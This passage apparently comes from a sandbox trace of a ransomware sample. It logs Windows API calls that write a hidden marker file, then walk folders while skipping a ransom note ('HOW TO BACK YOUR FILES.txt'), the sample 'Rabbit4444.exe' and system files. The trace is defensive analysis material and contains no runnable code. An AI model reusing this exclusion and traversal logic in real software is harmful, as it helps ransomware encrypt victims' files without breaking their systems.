lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\" [0070.692] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\.BFC0E91B00AE8A0620D3" [0070.692] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0070.698] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.701] FlushFileBuffers (hFile=0x27c) returned 1 [0070.701] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.702] CloseHandle (hObject=0x27c) returned 1 [0070.702] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives") returned 135 [0070.702] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.702] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1e2a2f0, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdd597b03, ftLastAccessTime.dwHighDateTime=0x1d327e6, ftLastWriteTime.dwLowDateTime=0xf3751f70, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0070.702] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.702] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.702] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.702] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.702] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1e2a2f0, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdd597b03, ftLastAccessTime.dwHighDateTime=0x1d327e6, ftLastWriteTime.dwLowDateTime=0xf3751f70, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.702] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.702] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.703] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.703] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.703] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.703] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf3751f70, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf3751f70, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf3777cfd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.703] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.703] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.703] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8c8f68d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe8aa796b, ftLastAccessTime.dwHighDateTime=0x1d327e6, ftLastWriteTime.dwLowDateTime=0xe8aa796b, ftLastWriteTime.dwHighDateTime=0x1d327e6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="202914", cAlternateFileName="")) returned 1 [0070.703] lstrcmpiW (lpString1="202914", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.703] lstrcmpiW (lpString1="202914", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.703] lstrcmpiW (lpString1="202914", lpString2="Rabbit4444.exe") returned -1 [0070.703] lstrcmpiW (lpString1="202914", lpString2=".") returned 1 [0070.703] lstrcmpiW (lpString1="202914", lpString2="..") returned 1 [0070.703] lstrcmpiW (lpString1="202914", lpString2="windows") returned -1 [0070.703] lstrcmpiW (lpString1="202914", lpString2="bootmgr") returned -1 [0070.703] lstrcmpiW (lpString1="202914", lpString2="pagefile.sys") returned -1 [0070.703] lstrcmpiW (lpString1="202914", lpString2="boot") returned -1 [0070.703] lstrcmpiW (lpString1="202914", lpString2="ids.txt") returned -1 [0070.703] lstrcmpiW (lpString1="202914", lpString2="NTUSER.DAT") returned -1 [0070.703] lstrcpyW (in: lpString1=0x130ec48, lpString2="202914" | out: lpString1="202914") returned="202914" [0070.703] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122320 [0070.703] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x11e) returned 0x11b380 [0070.703] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122328 | out: ListHead=0xf68b0, ListEntry=0x122328) returned 0x121fc8 [0070.703] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1e2a2f0, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x51556bba, ftLastAccessTime.dwHighDateTime=0x1d32719, ftLastWriteTime.dwLowDateTime=0x51556bba, ftLastWriteTime.dwHighDateTime=0x1d32719, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="210469", cAlternateFileName="")) returned 1 [0070.703] lstrcmpiW (lpString1="210469", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.703] lstrcmpiW (lpString1="210469", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.703] lstrcmpiW (lpString1="210469", lpString2="Rabbit4444.exe") returned -1 [0070.703] lstrcmpiW (lpString1="210469", lpString2=".") returned 1 [0070.703] lstrcmpiW (lpString1="210469", lpString2="..") returned 1 [0070.703] lstrcmpiW (lpString1="210469", lpString2="windows") returned -1 [0070.703] lstrcmpiW (lpString1="210469", lpString2="bootmgr") returned -1 [0070.703] lstrcmpiW (lpString1="210469", lpString2="pagefile.sys") returned -1 [0070.703] lstrcmpiW (lpString1="210469", lpString2="boot") returned -1 [0070.703] lstrcmpiW (lpString1="210469", lpString2="ids.txt") returned -1 [0070.703] lstrcmpiW (lpString1="210469", lpString2="NTUSER.DAT") returned -1 [0070.703] lstrcpyW (in: lpString1=0x130ec48, lpString2="210469" | out: lpString1="210469") returned="210469" [0070.704] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0070.704] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x11e) returned 0x115180 [0070.704] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122268 | out: ListHead=0xf68b0, ListEntry=0x122268) returned 0x122328 [0070.704] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a2d0a7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe7d37eb5, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xe7d37eb5, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="210509", cAlternateFileName="")) returned 1 [0070.704] lstrcmpiW (lpString1="210509", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.704] lstrcmpiW (lpString1="210509", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.704] lstrcmpiW (lpString1="210509", lpString2="Rabbit4444.exe") returned -1 [0070.704] lstrcmpiW (lpString1="210509", lpString2=".") returned 1 [0070.704] lstrcmpiW (lpString1="210509", lpString2="..") returned 1 [0070.704] lstrcmpiW (lpString1="210509", lpString2="windows") returned -1 [0070.704] lstrcmpiW (lpString1="210509", lpString2="bootmgr") returned -1 [0070.704] lstrcmpiW (lpString1="210509", lpString2="pagefile.sys") returned -1 [0070.704] lstrcmpiW (lpString1="210509", lpString2="boot") returned -1 [0070.704] lstrcmpiW (lpString1="210509", lpString2="ids.txt") returned -1 [0070.704] lstrcmpiW (lpString1="210509", lpString2="NTUSER.DAT") returned -1 [0070.704] lstrcpyW (in: lpString1=0x130ec48, lpString2="210509" | out: lpString1="210509") returned="210509" [0070.704] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122060 [0070.704] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x11e) returned 0x11d948 [0070.704] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122068 | out: ListHead=0xf68b0, ListEntry=0x122068) returned 0x122268 [0070.704] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89e0c44, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdcb9ba8c, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0xdcb9ba8c, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="214513", cAlternateFileName="")) returned 1 [0070.704] lstrcmpiW (lpString1="214513", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.704] lstrcmpiW (lpString1="214513", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.704] lstrcmpiW (lpString1="214513", lpString2="Rabbit4444.exe") returned -1 [0070.704] lstrcmpiW (lpString1="214513", lpString2=".") returned 1 [0070.704] lstrcmpiW (lpString1="214513", lpString2="..") returned 1 [0070.704] lstrcmpiW (lpString1="214513", lpString2="windows") returned -1 [0070.704] lstrcmpiW (lpString1="214513", lpString2="bootmgr") returned -1 [0070.704] lstrcmpiW (lpString1="214513", lpString2="pagefile.sys") returned -1 [0070.704] lstrcmpiW (lpString1="214513", lpString2="boot") returned -1 [0070.704] lstrcmpiW (lpString1="214513", lpString2="ids.txt") returned -1 [0070.704] lstrcmpiW (lpString1="214513", lpString2="NTUSER.DAT") returned -1 [0070.704] lstrcpyW (in: lpString1=0x130ec48, lpString2="214513" | out: lpString1="214513") returned="214513" [0070.704] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122140 [0070.704] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x11e) returned 0x11da70 [0070.704] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122148 | out: ListHead=0xf68b0, ListEntry=0x122148) returned 0x122068 [0070.704] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb619b0e, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xaa6b70e0, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xaa6b70e0, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="243289", cAlternateFileName="")) returned 1 [0070.705] lstrcmpiW (lpString1="243289", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.705] lstrcmpiW (lpString1="243289", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.705] lstrcmpiW (lpString1="243289", lpString2="Rabbit4444.exe") returned -1 [0070.705] lstrcmpiW (lpString1="243289", lpString2=".") returned 1 [0070.705] lstrcmpiW (lpString1="243289", lpString2="..") returned 1 [0070.705] lstrcmpiW (lpString1="243289", lpString2="windows") returned -1 [0070.705] lstrcmpiW (lpString1="243289", lpString2="bootmgr") returned -1 [0070.705] lstrcmpiW (lpString1="243289", lpString2="pagefile.sys") returned -1 [0070.705] lstrcmpiW (lpString1="243289", lpString2="boot") returned -1 [0070.705] lstrcmpiW (lpString1="243289", lpString2="ids.txt") returned -1 [0070.705] lstrcmpiW (lpString1="243289", lpString2="NTUSER.DAT") returned -1 [0070.705] lstrcpyW (in: lpString1=0x130ec48, lpString2="243289" | out: lpString1="243289") returned="243289" [0070.705] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222e0 [0070.705] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x11e) returned 0x11db98 [0070.705] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222e8 | out: ListHead=0xf68b0, ListEntry=0x1222e8) returned 0x122148 [0070.705] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x235399a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x25417c04, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x25417c04, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="243292", cAlternateFileName="")) returned 1 [0070.705] lstrcmpiW (lpString1="243292", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.705] lstrcmpiW (lpString1="243292", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.705] lstrcmpiW (lpString1="243292", lpString2="Rabbit4444.exe") returned -1 [0070.705] lstrcmpiW (lpString1="243292", lpString2=".") returned 1 [0070.705] lstrcmpiW (lpString1="243292", lpString2="..") returned 1 [0070.705] lstrcmpiW (lpString1="243292", lpString2="windows") returned -1 [0070.705] lstrcmpiW (lpString1="243292", lpString2="bootmgr") returned -1 [0070.705] lstrcmpiW (lpString1="243292", lpString2="pagefile.sys") returned -1 [0070.705] lstrcmpiW (lpString1="243292", lpString2="boot") returned -1 [0070.705] lstrcmpiW (lpString1="243292", lpString2="ids.txt") returned -1 [0070.705] lstrcmpiW (lpString1="243292", lpString2="NTUSER.DAT") returned -1 [0070.705] lstrcpyW (in: lpString1=0x130ec48, lpString2="243292" | out: lpString1="243292") returned="243292" [0070.705] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0070.705] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x11e) returned 0x11dcc0 [0070.705] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x1222e8 [0070.705] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfed624f3, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xaabc7b4a, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xaabc7b4a, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="279978", cAlternateFileName="")) returned 1 [0070.705] lstrcmpiW (lpString1="279978", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.705] lstrcmpiW (lpString1="279978", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.705] lstrcmpiW (lpString1="279978", lpString2="Rabbit4444.exe") returned -1 [0070.706] lstrcmpiW (lpString1="279978", lpString2=".") returned 1 [0070.706] lstrcmpiW (lpString1="279978", lpString2="..") returned 1 [0070.706] lstrcmpiW (lpString1="279978", lpString2="windows") returned -1 [0070.706] lstrcmpiW (lpString1="279978", lpString2="bootmgr") returned -1 [0070.706] lstrcmpiW (lpString1="279978", lpString2="pagefile.sys") returned -1 [0070.706] lstrcmpiW (lpString1="279978", lpString2="boot") returned -1 [0070.706] lstrcmpiW (lpString1="279978", lpString2="ids.txt") returned -1 [0070.706] lstrcmpiW (lpString1="279978", lpString2="NTUSER.DAT") returned -1 [0070.706] lstrcpyW (in: lpString1=0x130ec48, lpString2="279978" | out: lpString1="279978") returned="279978" [0070.706] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122160 [0070.706] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x11e) returned 0x104770 [0070.706] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122168 | out: ListHead=0xf68b0, ListEntry=0x122168) returned 0x122008 [0070.706] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x239fe4e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xa6b72c16, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xa6b72c16, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="279986", cAlternateFileName="")) returned 1 [0070.706] lstrcmpiW (lpString1="279986", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.706] lstrcmpiW (lpString1="279986", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.706] lstrcmpiW (lpString1="279986", lpString2="Rabbit4444.exe") returned -1 [0070.706] lstrcmpiW (lpString1="279986", lpString2=".") returned 1 [0070.706] lstrcmpiW (lpString1="279986", lpString2="..") returned 1 [0070.706] lstrcmpiW (lpString1="279986", lpString2="windows") returned -1 [0070.706] lstrcmpiW (lpString1="279986", lpString2="bootmgr") returned -1 [0070.706] lstrcmpiW (lpString1="279986", lpString2="pagefile.sys") returned -1 [0070.706] lstrcmpiW (lpString1="279986", lpString2="boot") returned -1 [0070.706] lstrcmpiW (lpString1="279986", lpString2="ids.txt") returned -1 [0070.706] lstrcmpiW (lpString1="279986", lpString2="NTUSER.DAT") returned -1 [0070.706] lstrcpyW (in: lpString1=0x130ec48, lpString2="279986" | out: lpString1="279986") returned="279986" [0070.706] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122080 [0070.706] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x11e) returned 0x104898 [0070.706] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122088 | out: ListHead=0xf68b0, ListEntry=0x122088) returned 0x122168 [0070.706] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41554e17, ftCreationTime.dwHighDateTime=0x1d32747, ftLastAccessTime.dwLowDateTime=0x821ae63c, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x821ae63c, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="280810", cAlternateFileName="")) returned 1 [0070.706] lstrcmpiW (lpString1="280810", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.706] lstrcmpiW (lpString1="280810", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.706] lstrcmpiW (lpString1="280810", lpString2="Rabbit4444.exe") returned -1 [0070.706] lstrcmpiW (lpString1="280810", lpString2=".") returned 1 [0070.706] lstrcmpiW (lpString1="280810", lpString2="..") returned 1 [0070.706] lstrcmpiW (lpString1="280810", lpString2="windows") returned -1 [0070.707] lstrcmpiW (lpString1="280810", lpString2="bootmgr") returned -1 [0070.707] lstrcmpiW (lpString1="280810", lpString2="pagefile.sys") returned -1 [0070.707] lstrcmpiW (lpString1="280810", lpString2="boot") returned -1 [0070.707] lstrcmpiW (lpString1="280810", lpString2="ids.txt") returned -1 [0070.707] lstrcmpiW (lpString1="280810", lpString2="NTUSER.DAT") returned -1 [0070.707] lstrcpyW (in: lpString1=0x130ec48, lpString2="280810" | out: lpString1="280810") returned="280810" [0070.707] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220c0 [0070.707] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x11e) returned 0x1049c0 [0070.707] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220c8 | out: ListHead=0xf68b0, ListEntry=0x1220c8) returned 0x122088 [0070.707] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x416d25ac, ftCreationTime.dwHighDateTime=0x1d32747, ftLastAccessTime.dwLowDateTime=0x8a8a5304, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x8a8a5304, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="280811", cAlternateFileName="")) returned 1 [0070.707] lstrcmpiW (lpString1="280811", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.707] lstrcmpiW (lpString1="280811", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.707] lstrcmpiW (lpString1="280811", lpString2="Rabbit4444.exe") returned -1 [0070.707] lstrcmpiW (lpString1="280811", lpString2=".") returned 1 [0070.707] lstrcmpiW (lpString1="280811", lpString2="..") returned 1 [0070.707] lstrcmpiW (lpString1="280811", lpString2="windows") returned -1 [0070.707] lstrcmpiW (lpString1="280811", lpString2="bootmgr") returned -1 [0070.707] lstrcmpiW (lpString1="280811", lpString2="pagefile.sys") returned -1 [0070.707] lstrcmpiW (lpString1="280811", lpString2="boot") returned -1 [0070.707] lstrcmpiW (lpString1="280811", lpString2="ids.txt") returned -1 [0070.707] lstrcmpiW (lpString1="280811", lpString2="NTUSER.DAT") returned -1 [0070.707] lstrcpyW (in: lpString1=0x130ec48, lpString2="280811" | out: lpString1="280811") returned="280811" [0070.707] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122340 [0070.707] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x11e) returned 0x104ae8 [0070.707] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122348 | out: ListHead=0xf68b0, ListEntry=0x122348) returned 0x1220c8 [0070.707] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3be9e93, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x35a99a0d, ftLastAccessTime.dwHighDateTime=0x1d327c2, ftLastWriteTime.dwLowDateTime=0x35a99a0d, ftLastWriteTime.dwHighDateTime=0x1d327c2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="280813", cAlternateFileName="")) returned 1 [0070.707] lstrcmpiW (lpString1="280813", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.707] lstrcmpiW (lpString1="280813", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.707] lstrcmpiW (lpString1="280813", lpString2="Rabbit4444.exe") returned -1 [0070.707] lstrcmpiW (lpString1="280813", lpString2=".") returned 1 [0070.707] lstrcmpiW (lpString1="280813", lpString2="..") returned 1 [0070.707] lstrcmpiW (lpString1="280813", lpString2="windows") returned -1 [0070.707] lstrcmpiW (lpString1="280813", lpString2="bootmgr") returned -1 [0070.707] lstrcmpiW (lpString1="280813", lpString2="pagefile.sys") returned -1 [0070.708] lstrcmpiW (lpString1="280813", lpString2="boot") returned -1 [0070.708] lstrcmpiW (lpString1="280813", lpString2="ids.txt") returned -1 [0070.708] lstrcmpiW (lpString1="280813", lpString2="NTUSER.DAT") returned -1 [0070.708] lstrcpyW (in: lpString1=0x130ec48, lpString2="280813" | out: lpString1="280813") returned="280813" [0070.708] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122280 [0070.708] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x11e) returned 0x104c10 [0070.708] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122288 | out: ListHead=0xf68b0, ListEntry=0x122288) returned 0x122348 [0070.708] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3c100a2, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xb0a11d08, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xb0a11d08, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="280815", cAlternateFileName="")) returned 1 [0070.708] lstrcmpiW (lpString1="280815", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.708] lstrcmpiW (lpString1="280815", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.708] lstrcmpiW (lpString1="280815", lpString2="Rabbit4444.exe") returned -1 [0070.708] lstrcmpiW (lpString1="280815", lpString2=".") returned 1 [0070.708] lstrcmpiW (lpString1="280815", lpString2="..") returned 1 [0070.708] lstrcmpiW (lpString1="280815", lpString2="windows") returned -1 [0070.708] lstrcmpiW (lpString1="280815", lpString2="bootmgr") returned -1 [0070.708] lstrcmpiW (lpString1="280815", lpString2="pagefile.sys") returned -1 [0070.708] lstrcmpiW (lpString1="280815", lpString2="boot") returned -1 [0070.708] lstrcmpiW (lpString1="280815", lpString2="ids.txt") returned -1 [0070.708] lstrcmpiW (lpString1="280815", lpString2="NTUSER.DAT") returned -1 [0070.708] lstrcpyW (in: lpString1=0x130ec48, lpString2="280815" | out: lpString1="280815") returned="280815" [0070.708] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0070.708] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x11e) returned 0x104d38 [0070.708] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122368 | out: ListHead=0xf68b0, ListEntry=0x122368) returned 